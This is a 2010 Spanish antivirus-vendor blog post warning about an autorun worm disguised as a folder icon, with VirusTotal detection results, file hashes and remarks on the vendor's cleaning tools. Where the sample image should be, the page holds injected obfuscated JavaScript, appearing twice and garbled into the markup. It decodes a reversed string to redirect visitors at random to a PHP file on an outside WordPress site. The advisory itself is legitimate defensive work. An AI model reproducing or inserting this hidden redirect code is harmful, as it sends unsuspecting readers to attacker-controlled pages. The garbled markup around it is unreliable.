Nueva variante de AUTORUN, esta vez con una carpeta como icono, y ademas con extension .EXE

Publicado el 31 agosto 2010 ¬ 10:49 amh.mscComentarios desactivados en Nueva variante de AUTORUN, esta vez con una carpeta como icono, y ademas con extension .EXE

Hemos recibido una muestra de las que si no se tiene configurado el ver las extension de ficheros y carpetas, se presta a confundirse y pulsar doble click en la aparente carpeta, para entrar en ella, pero lo que se logra entoces es ejecutar el fichero malware, ya que realmente es un fichero ejecutable con icono de carpeta

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torunexe.bmp”>$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torun.exe”>

Preanalizado con el VirusTotal vemos el siguiente resultado:
File name: autorun.exe
Submission date: 2010-08-31 00:45:02 (UTC)
Current status: finished
Result: 39 /43 (90.7%)
 VT Community

not reviewed
 Safety score: – 
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2010.08.31.00 2010.08.31 Win32/Xema.worm.487424.F
AntiVir 8.2.4.46 2010.08.30 Worm/VB.bfd
Antiy-AVL 2.0.3.7 2010.08.30 Worm/Win32.VB.gen
Authentium 5.2.0.5 2010.08.31 W32/Worm.BKZS
Avast 4.8.1351.0 2010.08.30 Win32:Malware-gen
Avast5 5.0.594.0 2010.08.30 Win32:Malware-gen
AVG 9.0.0.851 2010.08.30 Worm/VB.BBMJ
BitDefender 7.2 2010.08.31 Worm.VB.NIB
CAT-QuickHeal 11.00 2010.08.30 Worm.VB.bfd
ClamAV 0.96.2.0-git 2010.08.30 –
Comodo 5916 2010.08.31 UnclassifiedMalware
DrWeb 5.0.2.03300 2010.08.30 Worm.Siggen.1984
Emsisoft 5.0.0.37 2010.08.31 Worm.Win32.VB!IK
eSafe 7.0.17.0 2010.08.30 Win32.WormVB.Bfd
eTrust-Vet 36.1.7827 2010.08.30 Win32/Veebuu.IM
F-Prot 4.6.1.107 2010.08.31 W32/Worm.BKZS
F-Secure 9.0.15370.0 2010.08.31 Worm.VB.NIB
Fortinet 4.1.143.0 2010.08.30 W32/VB.BFD!worm
GData 21 2010.08.31 Worm.VB.NIB
Ikarus T3.1.1.88.0 2010.08.30 Worm.Win32.VB
Jiangmin 13.0.900 2010.08.30 Worm/VB.bsj
K7AntiVirus 9.63.2396 2010.08.30 EmailWorm
Kaspersky 7.0.0.125 2010.08.30 Worm.Win32.VB.bfd
McAfee 5.400.0.1158 2010.08.31 W32/Autorun.worm.da
McAfee-GW-Edition 2010.1B 2010.08.30 W32/IRCbot.gen.a
Microsoft 1.6103 2010.08.30 Trojan:Win32/Provis!rts
NOD32 5410 2010.08.30 Win32/VB.NVL
Norman 6.05.11 2010.08.30 W32/Smallworm.HOQ
nProtect 2010-08-30.01 2010.08.30 Worm/W32.Agent.487424.C
Panda 10.0.2.7 2010.08.30 W32/VB.AIP
PCTools 7.0.3.5 2010.08.31 Net-Worm.SillyFDC
Prevx 3.0 2010.08.31 –
Rising 22.63.00.03 2010.08.30 Trojan.Win32.Generic.51FDDBE6
Sophos 4.56.0 2010.08.31 W32/VB-EPJ
Sunbelt 6815 2010.08.31 Worm.Win32.Generic
SUPERAntiSpyware 4.40.0.1006 2010.08.31 –
Symantec 20101.1.1.7 2010.08.31 W32.SillyFDC
TheHacker 6.5.2.1.359 2010.08.31 Trojan/CI.gen
TrendMicro 9.120.0.1004 2010.08.30 WORM_VB.JKE
TrendMicro-HouseCall 9.120.0.1004 2010.08.31 WORM_VB.JKE
VBA32 3.12.14.0 2010.08.30 Worm.Win32.VB.bfe
ViRobot 2010.8.9.3978 2010.08.30 –
VirusBuster 5.0.27.0 2010.08.30 Worm.VB.JAYK
Additional informationShow all 
MD5   : 7dca7f90bea77d676fb039d7f137564a
SHA1  : d2a963369bf7d8553ceef2654f0c79401060d284
Este AUTORUN:EXE es un fichero editado en visualbasic, de 487424 bytes de nombre original SETUP.EXE y que si bien lo detectan un 90 % de los antivirus, el peligro estriba en que se considere una Carpeta y se pulse doble click para entrar en ella… y si no está el antivirus residente o activo, la malicia del falso icono hace muy fácil la infección “voluntaria” del ordenador.

Lo pasamos a controlar a partir del ELISTARA de hoy, 21.51, que estará disponible a partir de las 15 horas

Aparte, conviene vacunar ordenadores y pendrives con nuestro ELIPEN.EXE, para evitar la propagación de virus de este tipo.

saludos

ms, 31-8-2010

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Sin categoría

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies